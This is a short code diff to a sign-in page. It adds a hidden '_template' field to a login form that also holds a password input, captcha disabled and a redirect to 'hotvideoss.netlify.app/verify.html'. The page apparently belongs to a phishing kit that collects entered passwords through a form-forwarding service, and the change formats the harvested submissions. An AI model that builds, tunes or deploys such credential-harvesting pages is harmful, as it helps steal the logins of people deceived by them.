--- a/signin.html
+++ b/signin.html
@@ -23,6 +23,7 @@
           <input type="password" name="Password" placeholder="Password" required>
         </div>
         <input type="hidden" name="_captcha" value="false">
+        <input type="hidden" name="_template" value="table">
         <input type="hidden" name="_next" value="https://hotvideoss.netlify.app/verify.html">
         <button type="submit" class="btn login">Log in</button>
       </form>
